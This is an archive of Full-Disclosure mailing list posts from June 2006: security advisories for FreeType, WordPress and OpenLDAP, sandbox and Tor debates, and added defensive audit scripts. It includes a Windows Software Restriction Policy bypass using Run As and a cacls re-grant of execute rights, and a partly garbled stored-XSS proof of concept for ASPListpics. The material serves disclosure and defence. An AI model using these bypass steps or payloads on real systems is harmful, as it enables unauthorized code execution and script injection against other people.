[Full-disclosure] [SECURITY] [DSA 1095-1] New freetype packages fix several vulnerabilities

2006-06-09 Thread Martin Schulze
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 1095-1                      [EMAIL PROTECTED]
http://www.debian.org/security/                              Martin Schulze
June 10th, 2006                          http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package: freetype
Vulnerability  : integer overflows
Problem type   : local (remote)
Debian-specific: no
CVE IDs: CVE-2006-0747 CVE-2006-1861 CVE-2006-2493 CVE-2006-2661
CERT advisory  : 
BugTraq ID : 18034
Debian Bug : 

Several problems have been discovered in the FreeType 2 font engine.
The Common Vulnerabilities and Exposures project identifies the
following problems:

CVE-2006-0747

Several integer underflows have been discovered which could allow
remote attackers to cause a denial of service.

CVE-2006-1861

Chris Evans discovered several integer overflows that lead to a
denial of service or could possibly even lead to the execution of
arbitrary code.

CVE-2006-2493

Several more integer overflows have been discovered which could
possibly lead to the execution of arbitrary code.

CVE-2006-2661

A null pointer dereference could cause a denial of service.

For the old stable distribution (woody) these problems have been fixed in
version 2.0.9-1woody1.

For the stable distribution (sarge) these problems have been fixed in
version 2.1.7-2.5.

For the unstable distribution (sid) these problems will be fixed soon.

We recommend that you upgrade your libfreetype packages.


Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.0 alias woody
- --------------------------------


Re: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread Javor Ninov
I do not get your point about n3td3v. I also do not get "Good point
about symantec".
Are you stating that Symantec is not trustworthy?

Javor Ninov aka DrFrancky
http://securitydot.net


Alexander Hristov wrote:
> Good point about symantec



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread Alexander Hristov

Good point about symantec
On 6/3/06, n3td3v <[EMAIL PROTECTED]> wrote:

> We're the biggest security group around, there's nothing you can say to
> change that. We are professionals who work at the major dot-coms and
> earn all the money, you people are just stupid. You call us lame but
> look at you. None of you have released vulnerabilities. None of you are
> at the cutting edge of hacking, we're at the frontline of new tactics
> to hack application and network security. You guys are just the people
> sitting and waiting for hackers to post code so you can write about us
> on securityfocus.com and news.com. Joris Evers and Robert Lemos
> (Symantec/CNET) are making money out of everything posted on this
> list, that's why they are multi-million dollar corporations. They hate
> to see this list disrupted, because they can't make money while n3td3v
> bashing activity is underway. They hate to see their profit margins
> dipping, they don't like to see their mail box filled with propaganda
> for the biggest international non-profit group around. They want us to
> leave the list so they can make money from their software to sell to
> people. We're seen as the enemy...
> Not only do Symantec and CNET hate us, script kids hate us as well,
> because while the bashing is going on, no one is posting "free exploit
> code" for them to deface web sites with. Hahaha. The script kids and
> Symantec/CNET are the ones who hate n3td3v, all the real hackers are
> on the side of n3td3v, it's all about money at the end of the day. The
> people who can hack their own zero-day don't care if n3td3v posts to
> FD or not, it's only script kids and Symantec/CNET who care, because
> without FD, they wouldn't have any other source of information to know
> what's going on. These people need FD, it's like a life line to them, if
> it wasn't for FD, Symantec wouldn't know what was going on and neither
> would CNET, they wouldn't know what hackers were up to without FD and
> the Bugtraq list.





--
Best Regards,
Aleksander Hristov < root at securitydot.net > < http://securitydot.net >



RE: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

2006-06-09 Thread Bill Stout
Hi Dan,

There's a couple of ways it differs.

1. Programs running in DROPMYRIGHTS and RunAs can still access files and
directories to which 'everyone' has access.  It's not common for someone
to check the rights of every single directory in a computer to see who
has access to what.  A virtualized environment controls what directories
the environment has access to, to prevent dropping files in unwanted
areas and to prevent reading confidential data from files.  For example,
MS-Word launched in the virtualized space to open a download shouldn't
be able to open files in 'My Documents'.

2. DROPMYRIGHTS and RunAs exclude membership of the lowered user from
known privileged user groups, but not custom privileged user groups.
For example, you may have created a new group for backup (backup_exec),
and since that new group is not a known privileged group, membership of
the lowered user in that group is ignored.  See the tables in:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure11152004.asp

3. Changing the access permissions of a program to certain resources
often causes the program to crash.  It's a problem if the only
permissions available are read/write/modify/delete/enumerate, it's
undesirable to write or modify a value, and the program has to write or
modify a value to run.  For usability reasons, effectively having a
'virtualize' permission is useful.  This way only a copy of the value or
a temporary value is changed, which permits the program to run without
crashing, in a controlled environment.  This virtualization can be done
for the filesystem and registry, but system calls and COM can also be
virtualized (spoofed) to the virtual environment.

HTH

Bill Stout


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Dan
Renner
Sent: Thursday, June 08, 2006 10:33 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Want to test this desktop
barrier?,(Unauthorized offer) 0day protection

This definitely has more luxury features, but couldn't you do pretty
much the same with MSDN's DROPMYRIGHTS program?

It runs {whatever} program as a guest user, effectively dropping the 
capabilities of that program to do nefarious things.

--

Sincerely,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700



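Bill's first point, that a DROPMYRIGHTS or RunAs process still reaches anything 'everyone' can write to, is straightforward to audit. The PowerShell script below is an added example, not GreenBorder's or DROPMYRIGHTS' code: it walks a directory tree and reports folders where Everyone, Authenticated Users or BUILTIN\Users can create files, netting out explicit Deny entries for the same principal. The root path C:\ and the principal list are assumptions (English group names).

```powershell
# Added example (not from the original post): list directories under $Root
# where broad principals hold create-file rights. Reading an ACL needs
# READ_CONTROL on the folder, which ordinary users normally have.
function Get-BroadlyWritableDirectories {
    param(
        [Parameter(Mandatory)][string]$Root,
        # Principals whose write access means "anyone on the box" (assumed
        # list; group names as on an English Windows install).
        [string[]]$BroadPrincipals = @(
            'Everyone',
            'NT AUTHORITY\Authenticated Users',
            'BUILTIN\Users'
        )
    )
    $fsr = [System.Security.AccessControl.FileSystemRights]
    # Either bit lets a process drop a file or a subfolder into the directory.
    $writeMask = [int]($fsr::CreateFiles -bor $fsr::CreateDirectories)

    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $dir = $_
            try { $acl = Get-Acl -LiteralPath $dir.FullName -ErrorAction Stop }
            catch { return }   # ACL not readable: skipped, not proven safe
            foreach ($principal in $BroadPrincipals) {
                $aces = @($acl.Access | Where-Object { $_.IdentityReference.Value -eq $principal })
                if ($aces.Count -eq 0) { continue }
                $allowed = 0; $denied = 0
                foreach ($ace in $aces) {
                    $bits = ([int]$ace.FileSystemRights) -band $writeMask
                    if ($ace.AccessControlType -eq 'Allow') { $allowed = $allowed -bor $bits }
                    else                                    { $denied  = $denied  -bor $bits }
                }
                # An explicit Deny for the same principal overrides its Allow.
                $effective = $allowed -band (-bnot $denied)
                if ($effective -ne 0) {
                    [pscustomobject]@{
                        Directory = $dir.FullName
                        Principal = $principal
                        WriteBits = [System.Security.AccessControl.FileSystemRights]$effective
                        Inherited = [bool]($aces | Where-Object IsInherited)
                    }
                }
            }
        }
}

# Anything listed here is reachable by a DROPMYRIGHTS or RunAs process no
# matter how far its token has been lowered (assumed root: C:\).
Get-BroadlyWritableDirectories -Root 'C:\' | Sort-Object Directory | Format-Table -AutoSize
```
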

[Full-disclosure] RE: Windows Software Restriction Policy Protection Bypass

2006-06-09 Thread Roger A. Grimes
This has been publicly known and disclosed for many years, since XP
Pro was first released.

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Friday, June 09, 2006 4:05 AM
To: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk
Subject: Windows Software Restriction Policy Protection Bypass

Dear bugtraq@securityfocus.com,

  It was reported anonymously with a request to post it to the lists.

Windows Software Restriction Policy Protection Bypass

Author:  Anonymous
Class:   Restrictions bypass
Vector:  Local
Vendor:  Microsoft
Software: Windows XP SP2, Windows Server 2003 SP1
Risk level:  Low

Remark:

I don't know whether it is a bug or a feature, but I can't find any
documentation on this issue.

Description:

Software Restriction Policy restrictions don't apply if the user logs on
via the secondary logon service (Run As).

Test:

Create a new SRP policy (in a Local or Domain Level GPO, for User or for
Computer). Change the security level to Disallowed. Update the policy and
log on as a restricted user. Copy notepad to the desktop. Try to launch
notepad from the desktop (will fail). Right-click on notepad, choose Run
As, select "Following users", and type the current user name and
password. You'll see notepad launched. The CLI version (runas.exe)
provides similar results.

Remark:

Why are ACLs not a workaround?
If a user has the ability to write (create files) in any folder (for
example - profile, temporary internet files, whatever) he (or she, of
course) becomes the owner of the created files. And even if we revoke the
NTFS execute permission on any writable folder, the user can change
permissions on files, because he (or she, of course) is the
creator/owner of said file.

Example (user 'test' is not an administrator):

cd \noexec
copy \WINDOWS\system32\notepad.exe .
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe BUILTIN\Users:(DENY)(Special access:)
                                    FILE_EXECUTE

                      BUILTIN\Users:(DENY)(Special access:)
                                    WRITE_DAC
                                    WRITE_OWNER

                      BUILTIN\Administrators:F
                      NT AUTHORITY\SYSTEM:F
                      WINXP01\test:F
                      BUILTIN\Users:R

C:\noexec>notepad.exe
Access denided.

C:\noexec>cacls.exe notepad.exe /G test:F
C:\noexec>cacls notepad.exe
C:\noexec\notepad.exe WINXP01\test:F

C:\noexec>notepad.exe

Workaround:

Disable Secondary Logon service:

sc stop seclogon
sc config seclogon start= disabled

Timeline:

05.06 - Vulnerability discovered
08.06.06 - Vendor notification
09.06.06 - Vendor response

"Software  Restriction  Policy  and  Group  Policy  are  not meant to be
complete  security features...For full security, we recommend using ACLs
to protect the appropriate resources in your environment..."

09.06.06 - Public disclosure
  

--
http://www.security.nnov.ru
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The
Beatles)
+-o66o--+ /
|/

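Two defender-side checks for the conditions in the post, as an added PowerShell example that is neither 3APA3A's nor Microsoft's code: whether the Secondary Logon service is stopped and disabled as the workaround says, and which files in a "no-execute" folder are owned by an account that can simply rewrite the DACL, which is the post's reason that ACLs are not a workaround. The folder C:\noexec (taken from the post's session) and the trusted-owner list are assumptions; run it elevated.

```powershell
# Added example (not from the advisory). Assumes an elevated session on the
# machine being checked.

function Get-SeclogonState {
    # The post's workaround: stop and disable the Secondary Logon service
    # (sc stop seclogon / sc config seclogon start= disabled).
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='seclogon'"
    if ($null -eq $svc) { return $null }
    [pscustomobject]@{
        Service   = $svc.Name
        State     = $svc.State        # Running / Stopped
        StartMode = $svc.StartMode    # Auto / Manual / Disabled
        Hardened  = ($svc.StartMode -eq 'Disabled' -and $svc.State -eq 'Stopped')
    }
}

function Disable-Seclogon {
    # PowerShell equivalent of the two sc.exe commands in the post.
    Stop-Service -Name seclogon -Force -ErrorAction SilentlyContinue
    Set-Service  -Name seclogon -StartupType Disabled
}

function Get-OwnerRewritableFiles {
    param(
        [Parameter(Mandatory)][string]$Path,
        # Owners that are not an ordinary user (assumed list): a deny-execute
        # ACE on their files cannot be undone by the restricted user.
        [string[]]$TrustedOwners = @('NT AUTHORITY\SYSTEM',
                                     'BUILTIN\Administrators',
                                     'NT SERVICE\TrustedInstaller')
    )
    $execBit = [int][System.Security.AccessControl.FileSystemRights]::ExecuteFile
    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try { $acl = Get-Acl -LiteralPath $file.FullName -ErrorAction Stop } catch { return }
            $denyExec = $acl.Access | Where-Object {
                $_.AccessControlType -eq 'Deny' -and
                ((([int]$_.FileSystemRights) -band $execBit) -ne 0)
            }
            # NTFS lets an object's owner read and rewrite its DACL regardless
            # of the ACEs on it (the implicit READ_CONTROL/WRITE_DAC the post
            # relies on), so a deny-execute ACE on a user-owned file is only
            # advisory: the user can run "cacls ... /G user:F" exactly as shown.
            if ($denyExec -and ($TrustedOwners -notcontains $acl.Owner)) {
                [pscustomobject]@{
                    File    = $file.FullName
                    Owner   = $acl.Owner
                    Finding = 'owner can remove the deny-execute ACE'
                }
            }
        }
}

Get-SeclogonState | Format-List
Get-OwnerRewritableFiles -Path 'C:\noexec' | Format-Table -AutoSize
# Uncomment to apply the post's workaround on this host:
# Disable-Seclogon
```
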


Re: [Full-disclosure] Separate Debian from Full Disclosure

2006-06-09 Thread Eliah Kagan

On 6/9/06, ßµªSKãR †|wãri wrote:

> Hi all
>
> Here is a request: please do not merge Debian Mailing List mails with
> Full Disclosure.


Why? If they pertain to security vulnerabilities, they surely belong
on Full Disclosure.

"Any information pertaining to vulnerabilities is acceptable, for
instance announcement and discussion thereof, exploit techniques and
code, related tools and papers, and other useful information."
From: http://lists.grok.org.uk/full-disclosure-charter.html

-Eliah



Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

2006-06-09 Thread Cardoso
It's very light on the machine, does not slow down the browser. It also
gives access to the clipboard and other features outside the sandbox.

The site claims it works with Internet explorer, and it's their default
browser, but I opened Firefox, browsed around a little, changed a lot of
configurations, and it returned to the previous state after I finished
the session. 

I'm starting to enjoy the red border around GreenBorder's daltonic
programmers' fine piece of software. :):):)




On Fri, 9 Jun 2006 16:23:16 -0700
"Christian Swartzbaugh" <[EMAIL PROTECTED]> wrote:

CS> Dan,
CS> Sure both methods will prevent many viri from taking over your
CS> computer, but notice there is a major difference. You obviously have
CS> not used a limited account before because usually software developed
CS> for Windows will require some configuration or settings change in
CS> order to correctly function under a limited account, with a few
CS> notable exceptions. This instead claims to create a sandbox where the
CS> functionality of an Administrator account is preserved without the
CS> harmful effects by using a virtual type of environment that is
CS> separate.
CS> 
CS> I haven't used the software, but from the summary, that seems to be
CS> what was intended. Correct me if otherwise.
CS> 
CS> feofil

Allgemeinen Anschulterlaubnis
Cardoso <[EMAIL PROTECTED]> - SkypeIn: (11) 3711-2466 / (41) 3941-5299
vida digital: http://www.contraditorium.com site pessoal e blog: 
http://www.carloscardoso.com



Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

2006-06-09 Thread Christian Swartzbaugh

Dan,
Sure both methods will prevent many viri from taking over your
computer, but notice there is a major difference. You obviously have
not used a limited account before because usually software developed
for Windows will require some configuration or settings change in
order to correctly function under a limited account, with a few
notable exceptions. This instead claims to create a sandbox where the
functionality of an Administrator account is preserved without the
harmful effects by using a virtual type of environment that is
separate.

I haven't used the software, but from the summary, that seems to be
what was intended. Correct me if otherwise.

feofil








Re: [Full-disclosure] Want to test this desktop barrier?, (Unauthorized offer) 0day protection

2006-06-09 Thread Dan Renner
This definitely has more luxury features, but couldn't you do pretty
much the same with MSDN's DROPMYRIGHTS program?


It runs {whatever} program as a guest user, effectively dropping the 
capabilities of that program to do nefarious things.


--

Sincerely,

Dan Renner
President
Los Angeles Computerhelp
http://losangelescomputerhelp.com
818.352.8700



[EMAIL PROTECTED] wrote:


Message: 9

Date: Thu, 8 Jun 2006 10:14:21 -0700
From: "Bill Stout" <[EMAIL PROTECTED]>
Subject: [Full-disclosure] Want to test this desktop barrier?
        (Unauthorized offer) 0day protection
To: 
Message-ID:
<[EMAIL PROTECTED]>
Content-Type: text/plain; charset="us-ascii"

Hello All,

We have an early release of consumer desktop safety software that I'd
like some feedback on. 

http://www.greenborder.com/earlyaccess/ 


Our software runs on XP SP2, and creates an application-level virtual
environment primarily (for now) for Internet Explorer.  This prevents
modification of the base system by any content in the virtual
environment.  We refer to the virtual environment as 'x-space', or
'within GreenBorder'.  We apply access control from the virtual
environment to: the filesystem, registry, user shell, COM objects, and
system calls.

Although only Internet Explorer and applications which open downloaded
attachments are supported, other applications can be launched in the
GreenBorder environment.  Any processes running or temporary files or
temporary registry entries are wiped from the virtual environment by an
application reset.  Files can be saved to a specific directory only, and
applications in this environment are prevented from reading files
outside this one directory (applies confidentiality).

We don't determine what application running in the virtual environment
is malicious or not, so therefore this is not a replacement for
signature based protection systems.  Most anything can run in the
environment, it just can't modify local resources.  This is great
protection for 0-day exploits, and lets administrators wait to apply
patches off-hours.

Hammer on our software by running malware of your choice in the software
environment.  Please email me or the marketing email of your results.
If you're running intensive tests, I would still recommend using a
scratch system.

We also have an enterprise version which uses a central whitelist to
determine in which environment to open a site requested or Outlook
message received.

Bill Stout
www.greenborder.com


Appended below is our marketing spiel:



"We are very pleased to give you special, early access to GreenBorder
Pro, the new consumer edition of our patented enterprise technology
(that's already protecting thousands of users in some of the most
demanding environments).

With GreenBorder Pro, NOTHING CAN BREAK INTO YOUR PC from the Web.  You
can:
 *  Search & browse ANY website - without putting your PC, files or private
    identity data at risk (or leaving any trace on your PC of where you
    have been :)
 *  Shop & bank in privacy - without anything spying on your personal info,
    bank account and credit card numbers, passwords or online transactions
 *  Use any downloads - without worrying about anything nasty hidden inside

Simply click on the link below to get to the GreenBorder Pro VIP page.
There, you can see a guided tour, learn about the software, and download
your own copy. Here is a special VIP license key to copy & paste when
you install:


34422VS279429422K44W
Click here to get GreenBorder Pro
 


We would greatly appreciate any comments or suggestions you might have
along the way. Just email us at [EMAIL PROTECTED] or click on the
GreenBorder icon and select Contact Customer Support in the software
itself!"





RE: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread William Lefkovics
LOL

You know, I came here for the information.

But I stay solely for the entertainment.


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Rob Connon
(Info)
Sent: Friday, June 09, 2006 3:49 PM
To: Sergej
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] n3td3v bashers on FD





Re: [Full-disclosure] n3td3v bashers on FD

2006-06-09 Thread Rob Connon (Info)



> Who is this n3td3v? The only posts I find from him are just words like
> "we the rulez group" "we are the best" "you all are stupid" "internet
> is ours" or similar.

If this has been posted before please do forgive me, I found this while
looking around for amusing background info to pass my slowly moving
Friday afternoon..

www.n3td3v.com

This should provide some background for people interested in this
Internet phenomenon.


/rjc



[Full-disclosure] [ GLSA 200606-08 ] WordPress: Arbitrary command execution

2006-06-09 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200606-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: WordPress: Arbitrary command execution
      Date: June 09, 2006
      Bugs: #134397
        ID: 200606-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
WordPress fails to sufficiently check the format of cached username
data.

Background
==========

WordPress is a PHP and MySQL based content management and publishing
system.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /   Vulnerable   /              Unaffected
    -------------------------------------------------------------------
  1  www-apps/wordpress            < 2.0.3                     >= 2.0.3

Description
===

rgod discovered that WordPress insufficiently checks the format of
cached username data.

Impact
==

An attacker could exploit this vulnerability to execute arbitrary
commands by sending a specially crafted username. As of WordPress 2.0.2
the user data cache is disabled by default.

Workaround
==

There are no known workarounds at this time.

Resolution
==

All WordPress users should upgrade to the latest available version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/wordpress-2.0.3"

References
==

  [ 1 ] CVE-2006-2667
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2667
  [ 2 ] CVE-2006-2702
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2702

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200606-08.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



[Full-disclosure] rPSA-2006-0099-1 openldap openldap-clients openldap-servers

2006-06-09 Thread Justin M. Forbes
rPath Security Advisory: 2006-0099-1
Published: 2006-06-09
Products: rPath Linux 1
Rating: Minor
Exposure Level Classification: Weakness
Updated Versions:
openldap=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1
openldap-clients=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1
openldap-servers=/[EMAIL PROTECTED]:devel//1/2.2.26-8.3-1

References:
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2754
http://issues.rpath.com/browse/RPL-423
http://secunia.com/advisories/20126

Description:
Previous versions of the openldap server have a weakness reading
the openldap status file.  This weakness may result in some
vulnerability, which may include denial of service or remote
privilege escalation when an openldap service is exposed.



[Full-disclosure] ASPListPics

2006-06-09 Thread Morning Wood

- EXPL-A-2006-003 exploitlabs.com Retro Advisory 001 -

 - ASPListpics -




RETRO-RELEASE DATE:
==================
Nov 11, 2004

Duplicate Release: June 06, 2006
by: r0t
http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html
http://secunia.com/advisories/20517/


OVERVIEW
========
ASPListpics is a highly configurable ASP application that automatically
generates fast thumbnail web indexes of images in a folder structure.



AFFECTED PRODUCTS
=================
ASPListpics 4.x
http://www.iisworks.com



DETAILS
=======
1. XSS ( persistent )



PROOF OF CONCEPT LINKS AND RETRO-POC
====================================
1. XSS ( Cross Site Scripting )

There is persistent XSS inclusion in the "comments"
feature of ASPListpics in the following:

field "name"
field "comment"

By embedding various types of XSS into the comment
section, we are able to render JavaScript in the
user's browser.

Below is a simple PoC ( Proof of Concept ).

Enter a malicious script into the "comments" section.
comment: ohnohttp://whatismyip.com";>ouch

and is rendered as:
HTTP://[VULNERABLEHOST]/listpics/listpics.asp?a=rate&ID=[PICID]&Info=< 
SCRIPTING HERE >9000|0




CREDITS
=======
r0t - http://pridels.blogspot.com/2006/06/asp-listpics-43-xss-vuln.html



RETRO-CREDITS
=============
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs. At the original time
of discovery and retro-release date, the author was
not aware of any other advisories or patches available.

Retro-Advisories are released when either the same research
is released by a 3rd party, old private research that is no longer
active, or the product has been patched due to Vendor updates
before a formal Exploitlabs advisory was released to the public.


Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]

--
web: http://exploitlabs.com


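The two fields named in the advisory above are the classic stored-XSS shape: whatever is saved in "name" and "comment" is written back into the gallery page for every later visitor. As an added example, not code from the advisory or from ASPListpics, the Python below places the raw-concatenation pattern beside its output-encoded fix, and adds a small check a defender can run over request logs for the symptom the PoC URL shows (a rate request whose Info parameter decodes to markup). The log lines, the field layout and the listpics.asp query names are constructed for this example.

```python
import html
import re
from urllib.parse import parse_qs

# --- Output encoding for the two user-controlled comment fields ----------

def render_comment_unsafe(name, comment):
    """The vulnerable pattern: stored values concatenated straight into HTML.
    Kept only to contrast with render_comment(); never use it."""
    return f'<div class="comment"><b>{name}</b>: {comment}</div>'


def render_comment(name, comment):
    """Hardened form: every user-controlled value is HTML-encoded for the
    context it lands in.  quote=True also encodes ' and ", so the same
    helper is safe inside an attribute value as well as in element text."""
    safe_name = html.escape(name, quote=True)
    safe_comment = html.escape(comment, quote=True)
    return f'<div class="comment"><b>{safe_name}</b>: {safe_comment}</div>'


# --- Detection over request logs -----------------------------------------

# Anything that would parse as the start of a tag: "<", optional "/", letter.
TAG_RE = re.compile(r"<\s*/?\s*[A-Za-z]")


def contains_markup(value):
    """True if a stored or logged value contains what looks like an HTML tag."""
    return bool(TAG_RE.search(value))


# Constructed log lines (not from the advisory or any real server), in a
# simplified W3C extended layout: date time method uri-stem uri-query status.
# The advisory shows the comment text reflected into the Info parameter of
# listpics.asp?a=rate, so a rate request whose Info value decodes to markup
# is the symptom to hunt for after the fact.
SAMPLE_LOG = """\
2006-06-06 10:01:12 GET /listpics/listpics.asp a=rate&ID=17&Info=nice+picture9000|0 200
2006-06-06 10:02:45 GET /listpics/listpics.asp a=rate&ID=17&Info=%3Cscript%3Ealert(1)%3C/script%3E9000|0 200
2006-06-06 10:03:01 GET /listpics/listpics.asp a=view&ID=18 200
"""


def suspicious_rate_requests(log_text):
    """Return (timestamp, decoded Info value) for every rate request whose
    Info parameter contains markup once URL-decoded."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        date, time_, _method, path, query, _status = fields[:6]
        if not path.lower().endswith("listpics.asp"):
            continue
        params = parse_qs(query, keep_blank_values=True)  # percent-decodes values
        if params.get("a") != ["rate"]:
            continue
        for info in params.get("Info", []):
            if contains_markup(info):
                hits.append((f"{date} {time_}", info))
    return hits


if __name__ == "__main__":
    print(render_comment_unsafe("<script>", "x"))
    print(render_comment("<script>", "x"))
    for when, info in suspicious_rate_requests(SAMPLE_LOG):
        print(f"{when}: Info={info!r}")
```

Encoding on output rather than filtering on input is the durable fix: it does not depend on guessing every payload shape, and it keeps the stored data intact for other consumers. The log check is deliberately loose (any tag-like text in Info), which suits a one-off triage after an advisory like this one; tighten it before using it as a standing alert.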

Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Michael Holstein

Are you referring to telling end-users to click "Accept this
certificate permanently" box on the certificate warning pop-up?  Or is
there a software package out there that can do this without the
warning pop-up?


In Windoze, if you have a .cer file, and set the usage fields correctly 
when you issued it, the cert will go into the right certificate store 
automagically. You'd just link to that file somewhere and tell people to 
"right click, save to desktop, then double-click it there".




Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Brian Eaton

On 6/9/06, Tim <[EMAIL PROTECTED]> wrote:

For non-managed systems (which you
shouldn't allow into your network via a VPN anyway), installing a CA
cert is as simple as clicking on a link ONCE, and installing the cert.
This cert can be distributed over a VeriSign secured SSL connection.


Are you referring to telling end-users to click "Accept this
certificate permanently" box on the certificate warning pop-up?  Or is
there a software package out there that can do this without the
warning pop-up?

- Brian



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Ducki3

On 6/9/06, Rodrigo Barbosa <[EMAIL PROTECTED]> wrote:


Just because a park is a public place doesn't give me the right
to, let's say, drive a car over the grass.

Even in public places there are rules that should be followed.



Yea, but if you steal a car or take off your license plate and drive
over the grass, no matter how many witnesses saw you do it, you're
probably going to get away with it.

But on the matter of TOR. If people want to block it just for
protection against anonymous attacks, well then that's a waste of
time.

Duck



Re: [Full-disclosure] SSL VPNs and security

2006-06-09 Thread Tim
> Sure, it's trivial to create self-signed certs (or run a CA), but 
> distributing your cert (or the CA cert) to all but a handful of clients 
> is a logistical nightmare.

For company managed laptops, it is trivial to distribute via normal
software distribution processes.  For non-managed systems (which you
shouldn't allow into your network via a VPN anyway), installing a CA
cert is as simple as clicking on a link ONCE, and installing the cert.
This cert can be distributed over a VeriSign secured SSL connection.
Then when the website presents a page, it can dynamically sign certs for
each domain.  This stuff isn't really that hard.  The tools that the
industry has provided users just suck, that's all.

> If you're going to be installing stuff, might as well make that an 
> IKE/IPSEC client and do it the right way to begin with.

Well, I don't disagree with this one, but so many people who complain
about certificate distribution have not thought through the ways it can
happen.  Even with a real VPN, you really should be using client certs
anyway, which present the same distribution problems.  These problems
aren't made any easier by using a "trustworthy" CA which charges you.
The software you use is the biggest contributor to management headaches.

tim



Re: [Full-disclosure] Re: blocking tor is not the right way forward. It may just be the right way backward.

2006-06-09 Thread Jeffrey F. Bloss
Michael Holstein <[EMAIL PROTECTED]> wrote:

First, I'm a long time supporter of Tor and a staunch advocate of
anonymity and privacy.

I also believe your interpretation of the Internet is a bit...
distorted. :)

> We're not talking about authenticated websites here (perhaps I should 
> have made that more clear), nor are we talking about using TOR, etc.
> for malicious purposes.
> 
> For the purpose of this (largely theoretical) argument, I meant 
> "publicly accessible, non-authenticated websites".

And you're trying to justify unrestricted access to those public places
based on what amounts to a "discrimination" argument. A fallacious
premise.

Choosing to be anonymous isn't something you are, it's something you do.
A conscious choice, not an unavoidable consequence of your state of
being like race/color or sexual orientation. Consequently, it's a
quality that has no moral or legal protection.

Operators of public places certainly *do* have the right to regulate
access based on the conscious choices of their prospective patrons. A
restaurant, for example, can restrict access with an arbitrary dress
code along the lines of "suit and tie". They can even enforce that
policy according to time of day if they wish.

Operating a "public access" entity doesn't mean you abdicate all your
rights to limit access, it only means you're obligated to not limit
access based on certain criteria. You still have every right to set
non-discriminatory standards, and enforce them as you see fit as long
as the practice doesn't breach the rights of your patrons.

Now what, besides a clothing choice, is Tor? :)

-- 
Hand Crafted on Fri. Jun 09, 2006 at 13:27 

Outside of a dog, a book is a man's best friend. 
Inside of a dog, it's too dark to read.
 -- Groucho Marx



Re: Antw: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fix several vulnerabilities

2006-06-09 Thread Rodrigo Barbosa
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Jun 09, 2006 at 02:37:45PM -0300, Cardoso wrote:
> I wonder how much of a daily mail traffic is made of autoresponders and
> whitelist-challenge messages. 

I would not know, since my procmailrc sends all those whitelist-challenge
messages directly to /dev/null.

- -- 
Rodrigo Barbosa
"Quid quid Latine dictum sit, altum viditur"
"Be excellent to each other ..." - Bill & Ted (Wyld Stallyns)

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (GNU/Linux)

iD8DBQFEibRXpdyWzQ5b5ckRAgUzAKCr3WBkqogH/mVHsIDOT+8UFrLZHQCeIe6d
